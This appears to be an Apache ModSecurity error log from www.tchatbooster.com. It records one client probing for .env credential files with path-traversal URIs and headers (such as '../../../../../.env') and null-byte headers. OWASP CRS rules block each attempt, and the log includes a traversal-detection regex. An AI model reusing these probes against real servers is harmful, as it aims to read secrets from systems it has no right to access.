[Tue May 12 06:16:24.755767 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmM1tk6y7yBJLpJpE-QAAAJY"]
[Tue May 12 06:16:24.755836 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmM1tk6y7yBJLpJpE-QAAAJY"]
[Tue May 12 06:16:24.756010 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmM1tk6y7yBJLpJpE-QAAAJY"]
[Tue May 12 06:16:25.517013 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:25.521562 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmBfeipD4uoG21Fo_yQAAAAI"]
[Tue May 12 06:16:25.544356 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmRs7kySIUZ3ORnI1PwAAARE"]
[Tue May 12 06:16:25.544402 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmRs7kySIUZ3ORnI1PwAAARE"]
[Tue May 12 06:16:25.544429 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmRs7kySIUZ3ORnI1PwAAARE"]
[Tue May 12 06:16:25.544734 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKpmRfeipD4uoG21Fo_ywAAAAI"]
[Tue May 12 06:16:25.544917 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKpmRfeipD4uoG21Fo_ywAAAAI"]
[Tue May 12 06:16:25.545015 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmRs7kySIUZ3ORnI1PwAAARE"]
[Tue May 12 06:16:25.628609 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmdr1yOh9TvizezitoQAAAFE"]
[Tue May 12 06:16:25.628805 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmdr1yOh9TvizezitoQAAAFE"]
[Tue May 12 06:16:25.658664 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmM1tk6y7yBJLpJpE-QAAAJY"]
[Tue May 12 06:16:25.682206 2026] [core:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 06:16:26.340211 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmRfeipD4uoG21Fo_ywAAAAI"]
[Tue May 12 06:16:26.341158 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmRs7kySIUZ3ORnI1PwAAARE"]
[Tue May 12 06:16:26.368817 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKpmhfeipD4uoG21Fo_zQAAAAI"]
[Tue May 12 06:16:26.369034 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKpmhfeipD4uoG21Fo_zQAAAAI"]
[Tue May 12 06:16:26.369048 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369087 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369114 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369308 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369354 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369387 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.369777 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:26.439584 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmdr1yOh9TvizezitoQAAAFE"]
[Tue May 12 06:16:26.465280 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmtr1yOh9TvizezitowAAAFE"]
[Tue May 12 06:16:26.465472 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpmtr1yOh9TvizezitowAAAFE"]
[Tue May 12 06:16:26.637554 2026] [core:error] [pid 1842385:tid 1842410] [client 45.148.10.166:33252] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 06:16:27.284514 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmhfeipD4uoG21Fo_zQAAAAI"]
[Tue May 12 06:16:27.286192 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmhs7kySIUZ3ORnI1QQAAARE"]
[Tue May 12 06:16:27.307334 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKpmxfeipD4uoG21Fo_0AAAAAI"]
[Tue May 12 06:16:27.307518 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKpmxfeipD4uoG21Fo_0AAAAAI"]
[Tue May 12 06:16:27.419278 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.419330 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.419358 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.419583 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.419633 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
